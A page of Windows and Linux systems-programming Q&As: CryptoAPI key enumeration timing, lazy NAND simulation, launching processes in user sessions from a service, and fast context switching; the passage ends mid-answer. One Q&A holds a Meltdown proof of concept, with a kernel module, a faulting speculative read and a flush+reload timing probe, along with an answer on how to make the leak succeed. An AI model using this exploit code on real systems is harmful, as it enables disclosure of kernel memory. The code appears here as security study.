Slow key enumeration in a machine RSA key container - winapi

I need to enumerate keys in the machine key container. Although this is generally an optional provider function, both MS_STRONG_PROV and MS_ENH_RSA_AES_PROV support it. I do not think I am doing anything wrong or unusual: first, acquiring a context handle with CryptAcquireContext(... CRYPT_MACHINE_KEYSET | CRYPT_VERIFYCONTEXT ...), then calling CryptGetProvParam(... PP_ENUMCONTAINERS ...) repeatedly until the enumeration is exhausted:
void enum_keys(HCRYPTPROV hprov) {
    BYTE buf[1024]; // Max key name length we support.
    for (DWORD first_next = CRYPT_FIRST; 1; first_next = CRYPT_NEXT) {
        DWORD buf_len = sizeof buf;
        if (!CryptGetProvParam(hprov, PP_ENUMCONTAINERS, buf, &buf_len, first_next)) {
            if (GetLastError() == ERROR_NO_MORE_ITEMS) break;
            else exit(1);
        }
    }
}
void do_benchmark(DWORD enum_flags) {
    enum_flags |= CRYPT_VERIFYCONTEXT;
    HCRYPTPROV hprov;
    if (!CryptAcquireContext(&hprov, NULL, MS_ENH_RSA_AES_PROV_A,
                             PROV_RSA_AES, enum_flags))
        exit(1);
    int K = 100;
    ClockIn(); // Pseudocode.
    for (int i = 0; i < K; ++i)
        enum_keys(hprov);
    ClockOut(); // Pseudocode.
    printf(" %f ms per pass\n", TimeElapsed() / K);
    CryptReleaseContext(hprov, 0);
}
int main() {
    printf("--- User key store access performance test... ");
    do_benchmark(0);
    printf("--- Machine key store access performance test... ");
    do_benchmark(CRYPT_MACHINE_KEYSET);
    return 0;
}
To benchmark the enumeration, I leave context acquisition and release out of the loop, clock only the enumeration, and repeat it 100 times. What I am noticing is that the enumeration is significantly slower for a normal user than for an administrator. When I run the test as myself (a member of Administrators, with UAC enabled), I get:
--- User key store access performance test... 3.317211 ms per pass
--- Machine key store access performance test... 78.051593 ms per pass
However, when I run the same test from an elevated prompt, the result is dramatically different:
--- User key store access performance test... 3.279580 ms per pass
--- Machine key store access performance test... 1.499939 ms per pass
Under the hood, more keys are reported to an admin than to a non-admin user, but that's expected and normal. What I do not understand is why the enumeration is ~40 times slower for a non-admin user. Any pointers?
I am putting the full source of my test into a Gist. The test is run on a pretty generic Windows 7 machine without any crypto hardware.
Added: on a Server 2012 virtual machine on a Server 2012 Hyper-V host, the slowdown factor was even greater, over 130: 440 ms vs. 3.3 ms. 440 ms is indeed a performance issue for me.

Could it be related to this issue from Microsoft:
You experience poor performance when you call the CryptAcquireContext function in Windows Server 2008 R2 or in Windows 7
From the issue:
"This issue occurs because of a change in the CryptAcquireContext function in Windows Server 2008 R2 and in Windows 7.
This change checks whether the function runs in a domain environment. However, the process is time-consuming and causes the increased running time of the CryptAcquireContext function."
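If that KB article applies, the extra cost should show up in CryptAcquireContext itself, which the benchmark above deliberately keeps out of the timed loop. A quick way to check is to time acquisition/release on its own; this is only a sketch reusing the pseudocode timers from the question:
void time_acquire_release(DWORD enum_flags) {
    enum_flags |= CRYPT_VERIFYCONTEXT;
    int K = 100;
    ClockIn(); // Pseudocode.
    for (int i = 0; i < K; ++i) {
        HCRYPTPROV hprov;
        if (!CryptAcquireContext(&hprov, NULL, MS_ENH_RSA_AES_PROV_A,
                                 PROV_RSA_AES, enum_flags))
            exit(1);
        CryptReleaseContext(hprov, 0);
    }
    ClockOut(); // Pseudocode.
    printf(" %f ms per acquire/release\n", TimeElapsed() / K);
}
If the per-pass enumeration times stay slow while this number stays small, the KB article is unlikely to be the explanation.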

Related

Simulating (lazy) NAND memory on Windows

I'm running a firmware simulation in a DLL which has simulated NAND (256 MB or 1 GB). I want to avoid allocating memory for this on the heap and instead allocate it using virtual memory.
The memory initially needs to be cleared to 0xFF (as NAND is). However, I don't want to pay for that initialization (nor commit un-accessed pages), so ideally it should only allocate upon access. I also do not need to retain the data after the simulation exits.
Initial ideas are:
1) VirtualAlloc. I'm not sure, but perhaps I could use guard pages and then trap the exception on first access. I'm not sure it's ideal for a DLL to handle such SEH exceptions, though. Or is there a better way?
2) Create a big file that's initialized to 0xFF, then map a view of the file with copy-on-write.
Does anyone know if it is possible to create a file with a callback for providing the initial data?
I think 1) is probably the way to go, but I'm wondering whether that's really the best option.
Edit:
3) I've come up with another method that avoids the exception handler and also avoids creating a huge file:
Create a file that is the same size as dwAllocationGranularity (typically 64 KiB) and fill it with 0xFF. Then create multiple copy-on-write views of it in contiguous memory using MapViewOfFileEx + FILE_MAP_COPY (after an initial VirtualAlloc/VirtualFree to obtain a suitable base address at which we can hope to place the juxtaposed views). I need to test this a bit more fully; I have a slight concern about potential thread races. I'm only actually using a single thread, but the CRT does start a few too.
This means that code that only reads the virtual NAND also does not cause all pages to be committed.
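For illustration, here is a minimal sketch of that tiling approach. It substitutes a pagefile-backed section for an actual file (an assumption on my part), and it omits error handling and the retry that would be needed if another allocation grabs the reserved range between VirtualFree and MapViewOfFileEx:
#include <windows.h>
#include <string.h>

void *reserve_nand(SIZE_T total /* multiple of the allocation granularity */)
{
    SYSTEM_INFO si;
    GetSystemInfo(&si);
    SIZE_T gran = si.dwAllocationGranularity;   // typically 64 KiB

    // One granule-sized, pagefile-backed section filled with the 0xFF erase pattern.
    HANDLE hSec = CreateFileMapping(INVALID_HANDLE_VALUE, NULL,
                                    PAGE_READWRITE, 0, (DWORD)gran, NULL);
    void *init = MapViewOfFile(hSec, FILE_MAP_WRITE, 0, 0, gran);
    memset(init, 0xFF, gran);
    UnmapViewOfFile(init);

    // Reserve a contiguous range to find a base address, release it,
    // then try to re-take it granule by granule with copy-on-write views.
    BYTE *base = (BYTE *)VirtualAlloc(NULL, total, MEM_RESERVE, PAGE_NOACCESS);
    VirtualFree(base, 0, MEM_RELEASE);
    for (SIZE_T off = 0; off < total; off += gran) {
        if (!MapViewOfFileEx(hSec, FILE_MAP_COPY, 0, 0, gran, base + off))
            return NULL;   // someone else took the address; a real version would retry
    }
    return base;           // reads see 0xFF; writes fault in private copy-on-write pages
}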
Yes, basically option 1 is the best solution, but I would make the following changes: use a VEH instead of SEH (an SEH handler only fires for accesses made inside its guarded scope, whereas a VEH catches the access from any context and any thread), and instead of using guard pages, initially just reserve the memory region without committing it. Any access to the region then raises an exception; you handle it in the VEH by committing the page and filling it with the 0xFF pattern. Demo code:
PVOID g_NandBegin;
SIZE_T g_NandSize = 0x1000000;

LONG NTAPI Vex(::PEXCEPTION_POINTERS ExceptionInfo)
{
    ::PEXCEPTION_RECORD ExceptionRecord = ExceptionInfo->ExceptionRecord;
    if (ExceptionRecord->ExceptionCode == STATUS_ACCESS_VIOLATION &&
        ExceptionRecord->NumberParameters > 1)
    {
        // ExceptionInformation[1] is the faulting address.
        PVOID pv = (PVOID)ExceptionRecord->ExceptionInformation[1];
        if ((ULONG_PTR)pv - (ULONG_PTR)g_NandBegin < g_NandSize)
        {
            // Commit the touched page and fill it with the NAND erase pattern.
            SIZE_T RegionSize = 1;
            if (0 <= NtAllocateVirtualMemory(NtCurrentProcess(), &pv, 0, &RegionSize, MEM_COMMIT, PAGE_READWRITE))
            {
                RtlFillMemoryUlong(pv, RegionSize, MAXULONG);
                return EXCEPTION_CONTINUE_EXECUTION;
            }
        }
    }
    return EXCEPTION_CONTINUE_SEARCH;
}

void dc()
{
    if (PVOID pv = AddVectoredExceptionHandler(TRUE, Vex))
    {
        if (g_NandBegin = VirtualAlloc(0, g_NandSize, MEM_RESERVE, PAGE_READWRITE))
        {
            // Randomly probe the region: every read should see 0xFF.
            ULONG seed = ~GetTickCount();
            int n = 0x100;
            do
            {
                if (*(UCHAR*)((PBYTE)g_NandBegin + (((ULONG64)RtlRandomEx(&seed) * g_NandSize) >> 32)) != 0xFF)
                {
                    __debugbreak();
                }
            } while (--n);
            VirtualFree(g_NandBegin, 0, MEM_RELEASE);
        }
        RemoveVectoredExceptionHandler(pv);
    }
}

Encouraging the CPU to perform out of order execution for a Meltdown test

I am attempting to exploit the Meltdown security flaw on Ubuntu 16.04, with an unpatched 4.8.0-36 kernel, on an Intel Core i5-4300M CPU.
First, I am storing the secret data at an address in kernel space using a kernel module :
static __init int initialize_proc(void){
char* key_val = "abcd";
printk("Secret data address = %p\n", key_val);
printk("Value at %p = %s\n", key_val, key_val);
}
The printk statement gives me the address of the secret data.
Mar 30 07:00:49 VM kernel: [62055.121882] Secret data address = fa2ef024
Mar 30 07:00:49 VM kernel: [62055.121883] Value at fa2ef024 = abcd
I then attempt to access the data at this location and in the next instruction use it to cache an element of an array.
// Out of order execution
int meltdown(unsigned long kernel_addr) {
    char data = *(char *)kernel_addr;     // Raises exception
    array[data * 4096 + DELTA] += 10;     // <----- Execute out of order
    return 0;
}
I am expecting the CPU to go ahead and cache the array element at index (data*4096 + DELTA) while executing out of order. After that, the privilege check on the kernel address fails and SIGSEGV is raised.
I handle the SIGSEGV and then time the access to the array elements to determine which one has been cached:
void attackChannel_x86() {
    register uint64_t time1, time2;
    volatile uint8_t *addr;
    unsigned int aux;            // IA32_TSC_AUX output for __rdtscp
    int min = 10000;
    int temp, i, k;
    for (i = 0; i < 256; i++) {
        time1 = __rdtscp(&aux);              // timestamp before memory access
        temp = array[i * 4096 + DELTA];
        time2 = __rdtscp(&aux) - time1;      // change in timestamp after the access
        if (time2 <= min) {
            min = time2;
            k = i;
        }
    }
    printf("array[%d*4096+DELTA]\n", k);
}
Since the value in data is ‘a’, I am expecting the result to be array[97*4096 + DELTA] since ASCII value of ‘a’ is 97.
However, this is not working and I am getting random outputs.
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[241*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[78*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[146*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[115*4096+DELTA]
The possible reasons I could think of are:
1. The instruction caching the array element is not getting executed out of order.
2. Out of order execution is occurring but the cache is being flushed.
3. I have misunderstood the mapping of memory in the kernel module and the address I'm using is incorrect.
Since the system is vulnerable to meltdown, I am certain that rules out the 2nd possibility.
Hence, my question is: why is out of order execution not working here? Are there any options/flags that “encourage” the CPU to execute out of order?
Solutions I’ve already tried:
Using clock_gettime instead of rdtscp for timing memory access.
void attackChannel() {
    int i, k, temp;
    uint64_t diff;
    volatile uint8_t *addr;
    double min = 10000000;
    struct timespec start, end;
    for (i = 0; i < 256; i++) {
        addr = &array[i * 4096 + DELTA];
        clock_gettime(CLOCK_MONOTONIC, &start);
        temp = *addr;
        clock_gettime(CLOCK_MONOTONIC, &end);
        diff = end.tv_nsec - start.tv_nsec;
        if (diff <= min) {
            min = diff;
            k = i;
        }
    }
    if (min < 600)
        printf("Accessed element : array[%d*4096+DELTA]\n", k);
}
Keeping the arithmetic units “busy” by executing a loop (see meltdown_busy_loop)
void meltdown_busy_loop(unsigned long kernel_addr) {
    char kernel_data;
    asm volatile(
        ".rept 1000;"
        "add $0x01, %%eax;"
        ".endr;"
        :
        :
        : "eax"
    );
    kernel_data = *(char *)kernel_addr;
    array[kernel_data * 4096 + DELTA] += 10;
}
Using procfs to force the data into the cache before performing a timing attack (see meltdown)
int meltdown(unsigned long kernel_addr) {
    // Cache the data to improve success
    int fd = open("/proc/my_secret_key", O_RDONLY);
    if (fd < 0) {
        perror("open");
        return -1;
    }
    int ret = pread(fd, NULL, 0, 0);        // Data is cached
    char data = *(char *)kernel_addr;       // Raises exception
    array[data * 4096 + DELTA] += 10;       // <----- Out of order
    return 0;
}
For anyone interested in setting it up, here is the link to the GitHub repo.
For the sake of completeness, I am appending the main function and error handling code below:
void flushChannel() {
    int i;
    for (i = 0; i < 256; i++) array[i * 4096 + DELTA] = 1;
    for (i = 0; i < 256; i++) _mm_clflush(&array[i * 4096 + DELTA]);
}

void catch_segv() {
    siglongjmp(jbuf, 1);
}

int main() {
    unsigned long kernel_addr = 0xfa2ef024;
    signal(SIGSEGV, catch_segv);
    if (sigsetjmp(jbuf, 1) == 0) {
        // meltdown(kernel_addr);
        meltdown_busy_loop(kernel_addr);
    }
    else {
        printf("Memory Access Violation\n");
    }
    attackChannel_x86();
}
I think the data needs to be in L1d for Meltdown to work, and attempting to read it only through a TLB / page-table entry that doesn't have privileges won't bring it into L1d.
http://blog.stuffedcow.net/2018/05/meltdown-microarchitecture/
When any kind of bad outcome occurs (page fault, load from a non-speculative memory type, page accessed bit = 0), none of the processors initiate an off-core L2 request to fetch the data.
Unless there's something I'm missing, I think data is only vulnerable to Meltdown when something that is allowed to read it has brought it into L1d. (Directly or via HW prefetch.) I don't think repeated Meltdown attacks can bring data from RAM into L1d.
Try adding a system call or something to your module that uses READ_ONCE() on your secret data (or manually write *(volatile int*)&data; or just make it volatile so you can easily touch it) to bring it into cache from a context that does have privileges for that PTE.
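As a hedged illustration of that suggestion (this is not the poster's module; all names here are made up), a minimal /proc entry whose read handler touches the secret from kernel context, so a privileged access pulls the line into L1d before the user-space probe runs:
#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/fs.h>
#include <linux/compiler.h>

static char secret[] = "abcd";

/* Reading this /proc entry touches the secret with kernel privileges,
 * which is what brings the cache line into L1d. No data is copied out. */
static ssize_t touch_read(struct file *f, char __user *buf,
                          size_t len, loff_t *off)
{
    volatile char tmp = READ_ONCE(secret[0]);
    (void)tmp;
    return 0;
}

static const struct file_operations touch_fops = {
    .owner = THIS_MODULE,
    .read  = touch_read,
};

static int __init touch_init(void)
{
    proc_create("touch_secret", 0444, NULL, &touch_fops);
    printk("Secret data address = %p\n", secret);
    return 0;
}
module_init(touch_init);
MODULE_LICENSE("GPL");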
Also: add $0x01, %%eax is a poor choice for delaying retirement. It's only 1 clock cycle of delay per uop, so OoO exec only has ~64 cycles from when the first instruction after the ADDs can enter the scheduler (RS) and run, before it chews through the adds and the faulting loads reach retirement.
At least use imul (3c latency), or better use xorps %xmm0,%xmm0 / repeated sqrtpd %xmm0,%xmm0 (single uop, 16 cycle latency on your Haswell.) https://agner.org/optimize/.
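For reference, a sketch of that variant, reusing array and DELTA from the question; the .rept count of 64 is an arbitrary choice, not a tuned value:
void meltdown_sqrt_delay(unsigned long kernel_addr)
{
    char data;
    asm volatile(
        "xorps %%xmm0, %%xmm0;"     // xmm0 = 0.0
        ".rept 64;"
        "sqrtpd %%xmm0, %%xmm0;"    // serially dependent, ~16-cycle latency each on Haswell
        ".endr;"
        :
        :
        : "xmm0"
    );
    data = *(char *)kernel_addr;          // faults, but may still execute speculatively
    array[data * 4096 + DELTA] += 10;     // leaves a cache footprint if it does
}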

CreateProcessAsUser from service with proper PEB and ACL

I have read tons of SO questions on this matter, but I didn't find a real definitive guide for doing this the right way.
My goal is to enumerate [disconnected and active] user console sessions and start a process in each one of them. Every user session process requires at least these rights in its DACL:
Token access rights:
TOKEN_QUERY (for GetTokenInformation())
TOKEN_QUERY_SOURCE (for GetTokenInformation())
Process access rights:
PROCESS_QUERY_INFORMATION (for OpenProcessToken())
PROCESS_QUERY_INFORMATION | PROCESS_VM_READ (for GetModuleFileNameEx())
PROCESS_VM_OPERATION (used with GetTokenInformation() to get other processes' usernames later with LookupAccountSid())
But as you can read here (at the bottom) : "Windows Vista introduces protected processes to enhance support for Digital Rights Management. The system restricts access to protected processes and the threads of protected processes."
So I thought that maybe with only PROCESS_QUERY_LIMITED_INFORMATION I could still get some information about other processes. I tried QueryFullProcessImageName() for elevated processes starting from Vista (see Giori's answer), but it no longer seems to work.
Solution: CreateProcessAs_LOCAL_SYSTEM using a duplicated token of the Windows service.
Problem: The spawned processes should have the respective logged on user's environment variables set to be able to locate network printers and mapped drives among other things. But if I use the service's token I inherit its PEB and I can't even translate the mapped drives to their UNC paths.
So I started looking for ways to "elevate" the process and bypass the UAC prompt. I tried:
Enabling some privileges like SE_DEBUG_PRIVILEGE in the token using AdjustTokenPrivileges() (does not work if the token does not have those privileges; this can be verified first using LookupPrivilegeValue())
Using the token from winlogon.exe (does not work)
Changing the DACL (source code) (didn't work)
The steps I'm following are :
Enumerate sessions using WTSEnumerateSessions()
Get the token (two choices) :
SYSTEM token : OpenProcessToken(GetCurrentProcess(),TokenAccessLevels.MaximumAllowed, out hProcessToken)
User token : WTSQueryUserToken(sessionId, out hUserToken)
Duplicate the token using DuplicateTokenEx()
LookupPrivilegeValue() / AdjustTokenPrivileges() (useless?)
CreateEnvironmentBlock()
CreateProcessAsUser(), flags: NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT, startup info's desktop: "WinSta0\Default"
Change process DACL (see link above; useless?)
Dispose/Clean : destroy PEB created, close opened handles and free memory.
My question: how can I grant the process created with CreateProcessAsUser() from a Windows service running under the LOCAL_SYSTEM account enough privileges/rights to get information on other processes (from other sessions, of other users, and at different integrity levels) without losing the user's environment variables?
You're confused about a number of things.
Every user session process requires at least these rights in its DACL
The process DACL controls access to that process; it does not determine what access that process has. It is the process's security token that determines its access rights.
Windows Vista introduces protected processes to enhance support for Digital Rights Management.
It seems clear that you haven't gotten far enough to worry about protected processes yet. Get it to work for ordinary processes first!
The spawned processes should have the respective logged on user's environment variables set to be able to locate network printers and mapped drives among other things.
Network printers and mapped drives have nothing to do with environment variables. I think what you're trying to do is to put the new process into the user's logon session, that's what controls network drive mappings and the like.
how can I grant the process created with CreateProcessAsUser() [...] enough privileges/rights to get information on other processes (from other sessions, of other users, and at different integrity levels) without losing the user's environment variables?
Don't. This would violate the integrity of the security model.
Instead, enumerate and query processes from the system service, and pass only whatever information is necessary to the user session processes, using shared memory (look up "file mapping object" in MSDN) or another suitable IPC mechanism.
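As a sketch of that direction (the object name and the record layout here are illustrative, not from the question), the service can publish what it gathered into a named file mapping that the session processes open read-only:
#include <windows.h>
#include <string.h>

struct ProcInfo { DWORD pid; WCHAR user[64]; WCHAR image[MAX_PATH]; };

HANDLE publish_proc_info(const struct ProcInfo *items, DWORD count)
{
    DWORD bytes = sizeof(DWORD) + count * sizeof(struct ProcInfo);
    // "Global\\" makes the mapping visible from other sessions; a real service
    // should also attach a DACL that grants the session processes read access.
    HANDLE hMap = CreateFileMappingW(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE,
                                     0, bytes, L"Global\\MyService.ProcInfo");
    if (!hMap)
        return NULL;
    BYTE *view = (BYTE *)MapViewOfFile(hMap, FILE_MAP_WRITE, 0, 0, bytes);
    memcpy(view, &count, sizeof(count));
    memcpy(view + sizeof(count), items, count * sizeof(struct ProcInfo));
    UnmapViewOfFile(view);
    return hMap;   // keep the handle open for the lifetime of the published data
}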
I know this was asked a while ago, but since I happened to be doing the same thing, below is working pseudo-code.
First, how to run a process in a user session from a service:
//IMPORTANT: All error checks are omitted for brevity!
//           Each of the lines of code below MUST be
//           checked for possible errors!!!

//INFO: The following pseudo-code is intended to run
//      from the Windows local service.

DWORD dwSessionID;      //Session ID to run your user process in

//Get token for the session ID
HANDLE hToken;
WTSQueryUserToken(dwSessionID, &hToken);

//Duplicate this token
HANDLE hToken2;
DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hToken2);

PSID gpSidMIL_High = NULL;

if(you_want_to_change_integrity_level_for_user_process)
{
    if(!Windows_XP)
    {
        //For example, create "high" mandatory integrity level SID
        ::ConvertStringSidToSid(L"S-1-16-12288", &gpSidMIL_High);

        TOKEN_MANDATORY_LABEL tml = {0};
        tml.Label.Attributes = SE_GROUP_INTEGRITY;
        tml.Label.Sid = gpSidMIL_High;

        SetTokenInformation(hToken2, TokenIntegrityLevel, &tml,
            sizeof(TOKEN_MANDATORY_LABEL) + ::GetSidLengthRequired(1));
    }
}

//Copy environment strings
LPVOID pEnvBlock = NULL;
CreateEnvironmentBlock(&pEnvBlock, hToken2, FALSE);

//Initialize the STARTUPINFO structure.
//Specify that the process runs in the interactive desktop.
STARTUPINFO si;
ZeroMemory(&si, sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
si.lpDesktop = _T("winsta0\\default");

PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));

//Create non-const buffer
TCHAR pBuffCmdLine[MAX_PATH];
pBuffCmdLine[0] = 0;

//Copy process path & parameters to the non-constant buffer
StringCchCopy(pBuffCmdLine, MAX_PATH, L"\"C:\\Program Files (x86)\\Company\\Brand\\process.exe\" -parameter");

//Impersonate the user
ImpersonateLoggedOnUser(hToken2);

//Launch the process in the user session.
bResult = CreateProcessAsUser(
    hToken2,                    // client's access token
    L"C:\\Program Files (x86)\\Company\\Brand\\process.exe",    // file to execute
    pBuffCmdLine[0] != 0 ? pBuffCmdLine : NULL,                 // command line
    NULL,                       // pointer to process SECURITY_ATTRIBUTES
    NULL,                       // pointer to thread SECURITY_ATTRIBUTES
    FALSE,                      // handles are not inheritable
    NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT,   // creation flags
    pEnvBlock,                  // pointer to new environment block
    NULL,                       // name of current directory
    &si,                        // pointer to STARTUPINFO structure
    &pi                         // receives information about new process
    );

//Get last error
nOSError = GetLastError();

//Revert to self
RevertToSelf();

//At this point you may want to wait for the user process to start, etc.
//using its handle in `pi.hProcess`
...

//Otherwise, close handles
if(pi.hProcess)
    CloseHandle(pi.hProcess);
if(pi.hThread)
    CloseHandle(pi.hThread);

//Clean-up
if(pEnvBlock)
    DestroyEnvironmentBlock(pEnvBlock);

CloseHandle(hToken2);
CloseHandle(hToken);

if(gpSidMIL_High)
    ::LocalFree(gpSidMIL_High);
If you need to run your process in all sessions that have a logged-in interactive user, you can call the method above for each session obtained from the following enumeration:
//Enumerate all sessions
WTS_SESSION_INFO* pWSI = NULL;
DWORD nCntWSI = 0;
if(WTSEnumerateSessions(WTS_CURRENT_SERVER_HANDLE, NULL, 1, &pWSI, &nCntWSI))
{
    //Go through all sessions
    for(DWORD i = 0; i < nCntWSI; i++)
    {
        //To select logged in interactive user session,
        //try to get its name. If you get something, then
        //this session has a user logged in to...
        LPTSTR pUserName = NULL;
        DWORD dwcbSzUserName = 0;
        if(WTSQuerySessionInformation(WTS_CURRENT_SERVER_HANDLE,
            pWSI[i].SessionId,
            WTSUserName, &pUserName, &dwcbSzUserName) &&
            pUserName &&
            dwcbSzUserName >= sizeof(TCHAR) &&
            pUserName[0] != 0)
        {
            //Use my method above to run your user process
            //in this session.
            DWORD dwSessionID = pWSI[i].SessionId;
        }

        //Free mem
        if(pUserName)
            WTSFreeMemory(pUserName);
    }

    //Free mem
    WTSFreeMemory(pWSI);
}

How to make a fast context switch from one process to another?

I need to run unsafe native code in a sandbox process, and I need to reduce the bottleneck of the process switch. Both processes (controller and sandbox) share two auto-reset events and a coherent view of a mapped file (shared memory) that is used for communication.
To keep this post short, I removed the initialization from the sample code, but the events are created by the controller, duplicated using DuplicateHandle, and then sent to the sandbox process before the work starts.
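For reference, a minimal sketch of that omitted setup, assuming hSandboxProcess is a handle to the already-created sandbox process; the duplicated handle values are passed to the sandbox out of band (e.g. on its command line or through the shared mapping):
#include <windows.h>

void createSharedEvents(HANDLE hSandboxProcess,
                        HANDLE *hNewRequest, HANDLE *hAnswer,
                        HANDLE *hNewRequestRemote, HANDLE *hAnswerRemote)
{
    // Auto-reset events, initially non-signalled.
    *hNewRequest = CreateEvent(NULL, FALSE, FALSE, NULL);
    *hAnswer     = CreateEvent(NULL, FALSE, FALSE, NULL);
    // Duplicate them into the sandbox process so it can wait on and signal them.
    DuplicateHandle(GetCurrentProcess(), *hNewRequest, hSandboxProcess,
                    hNewRequestRemote, 0, FALSE, DUPLICATE_SAME_ACCESS);
    DuplicateHandle(GetCurrentProcess(), *hAnswer, hSandboxProcess,
                    hAnswerRemote, 0, FALSE, DUPLICATE_SAME_ACCESS);
}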
Controller source:
void inSandbox(HANDLE hNewRequest, HANDLE hAnswer, volatile int *shared) {
    int before = *shared;
    for (int i = 0; i < 100000; ++i) {
        // Notify sandbox of a new request and wait for answer.
        SignalObjectAndWait(hNewRequest, hAnswer, INFINITE, FALSE);
    }
    assert(*shared == before + 100000);
}

void inProcess(volatile int *shared) {
    int before = *shared;
    for (int i = 0; i < 100000; ++i) {
        newRequest(shared);
    }
    assert(*shared == before + 100000);
}

void newRequest(volatile int *shared) {
    // In this test, the request only increments an int.
    (*shared)++;
}
Sandbox source:
void sandboxLoop(HANDLE hNewRequest, HANDLE hAnswer, volatile int *shared) {
    // Wait for the first request from controller.
    assert(WaitForSingleObject(hNewRequest, INFINITE) == WAIT_OBJECT_0);
    for (;;) {
        // Perform request.
        newRequest(shared);
        // Notify controller and wait for next request.
        SignalObjectAndWait(hAnswer, hNewRequest, INFINITE, FALSE);
    }
}

void newRequest(volatile int *shared) {
    // In this test, the request only increments an int.
    (*shared)++;
}
Measurements:
inSandbox() - 550ms, ~350k context switches, 42% CPU (25% kernel, 17% user).
inProcess() - 20ms, ~2k context switches, 55% CPU (2% kernel, 53% user).
The machine is a Windows 7 Pro box, Core 2 Duo P9700 with 8 GB of memory.
An interesting fact is that the sandbox solution uses 42% of CPU vs. 55% for the in-process solution. Another noteworthy fact is that the sandbox solution incurs 350k context switches, which is far more than the 200k we would expect from the source code.
I need to know if there's a way to reduce the overhead of transferring control to another process. I have already tried using pipes instead of events, and it was much worse. I also tried using no event at all, by having the sandbox call SuspendThread(GetCurrentThread()) and the controller call ResumeThread(hSandboxThread) on every request, but performance was similar to using events.
If you have a solution that uses assembly (like performing a manual context switch) or Windows Driver Kit, please let me know as well. I don't mind having to install a driver to make this faster.
I heard that Google Native Client does something similar, but I only found this documentation. If you have more information, please let me know.
The first thing to try is raising the priority of the waiting thread. This should reduce the number of extraneous context switches.
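For example (a sketch only; hSandboxThread is assumed to be a handle to the sandbox's waiting thread):
// Raise the priority of the thread that sits in SignalObjectAndWait so the
// scheduler hands the CPU to it promptly once it is signalled.
SetThreadPriority(hSandboxThread, THREAD_PRIORITY_HIGHEST);
// Or, equivalently, from inside the sandbox itself:
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);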
Alternatively, since you're on a 2-core system, using spinlocks instead of events would make your code much, much faster, at the cost of system performance and power consumption:
void inSandbox(volatile int *lock, volatile int *shared)
{
    int i, before = *shared;
    for (i = 0; i < 100000; ++i) {
        *lock = 1;
        while (*lock != 0) { }
    }
    assert(*shared == before + 100000);
}

void newRequest(volatile int *shared) {
    // In this test, the request only increments an int.
    (*shared)++;
}

void sandboxLoop(volatile int *lock, volatile int *shared)
{
    for (;;) {
        while (*lock != 1) { }
        newRequest(shared);
        *lock = 0;
    }
}
In this scenario, you should probably set thread affinity masks and/or lower the priority of the spinning thread so that it doesn't compete with the busy thread for CPU time.
Ideally, you'd use a hybrid approach. When one side is going to be busy for a while, let the other side wait on an event so that other processes can get some CPU time. You could trigger the event a little ahead of time (using the spinlock to retain synchronization) so that the other thread will be ready when you are.
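A minimal sketch of that hybrid, under the assumption that the producer publishes a request with InterlockedExchange(flag, 1) followed by SetEvent on the same auto-reset event (SPIN_LIMIT and all names are illustrative):
#include <windows.h>

#define SPIN_LIMIT 4000

void waitForRequest(volatile LONG *flag, HANDLE hEvent)
{
    // Fast path: spin briefly on the shared flag while the other side is active.
    for (int i = 0; i < SPIN_LIMIT; ++i) {
        if (InterlockedCompareExchange(flag, 0, 1) == 1) {
            WaitForSingleObject(hEvent, 0);   // consume the matching signal, if any
            return;
        }
        YieldProcessor();                     // pause; be polite to the other logical CPU
    }
    // Slow path: give up the CPU until the producer signals the event.
    WaitForSingleObject(hEvent, INFINITE);
    InterlockedExchange(flag, 0);
}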

Does CancelSynchronousIo work with WNetAddConnection2?

I'm trying and failing to cancel a call to WNetAddConnection2 with CancelSynchronousIo.
The call to CancelSynchronousIo succeeds but nothing is actually cancelled.
I'm using a 32-bit console app running on Windows 7 x64.
Has anyone done this successfully? Am I doing something dumb? Here's a sample console app (which needs to be linked with mpr.lib):
DWORD WINAPI ConnectThread(LPVOID param)
{
    NETRESOURCE nr;
    memset(&nr, 0, sizeof(nr));
    nr.dwType = RESOURCETYPE_ANY;
    nr.lpRemoteName = L"\\\\8.8.8.8\\bog";

    // result is ERROR_BAD_NETPATH (i.e. the call isn't cancelled)
    DWORD result = WNetAddConnection2(&nr, L"pass", L"user", CONNECT_TEMPORARY);

    return 0;
}

int _tmain(int argc, _TCHAR* argv[])
{
    // Create a new thread to run WNetAddConnection2
    HANDLE hThread = CreateThread(0, 0, ConnectThread, 0, 0, 0);
    if (!hThread)
        return 1;

    // Retry the cancel until it fails; keep track of how often
    int count = 0;
    BOOL ok;
    do
    {
        // Sleep to give the thread a chance to start
        Sleep(1000);
        ok = CancelSynchronousIo(hThread);
        ++count;
    }
    while (ok);

    // count will equal two here (i.e. one successful cancellation and
    // one failed cancellation)

    // err is ERROR_NOT_FOUND (i.e. nothing to cancel) which makes
    // sense for the second call
    DWORD err = GetLastError();

    // Wait for the thread to finish; this takes ages (i.e. the
    // WNetAddConnection2 call is not cancelled)
    WaitForSingleObject(hThread, INFINITE);

    return 0;
}
According to Larry Osterman (I hope he doesn't mind me quoting him): "The question was answered in the comments: wnetaddconnection2 isn’t a simple IOCTL call." So the answer (unfortunately) is no.
First, WNetAddConnection2 is system-wide, not per-process. This is important, as calling WNetAddConnection2 many times can wreck system stability - particularly with explorer.
I use WNetGetResourceInformation first to check if the connection already exists before even thinking of calling it; my process may have previously run and then shut down, and the connection may still exist. When my Windows service needs to add such a connection, I use a nasty little trick to prevent these totally non-abortable APIs from stalling my own service shutdown.
The trick is to run these calls in a separate process: they are system-wide, after all. You can wait for the process to complete as if you had called the functions yourself, but you can also terminate the process and give up waiting if you need to abort in order to shut down.
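A rough sketch of that trick (the helper command line and all names are illustrative; in this setup the helper is assumed to be a small executable that just calls WNetAddConnection2 with the arguments it is given):
#include <windows.h>

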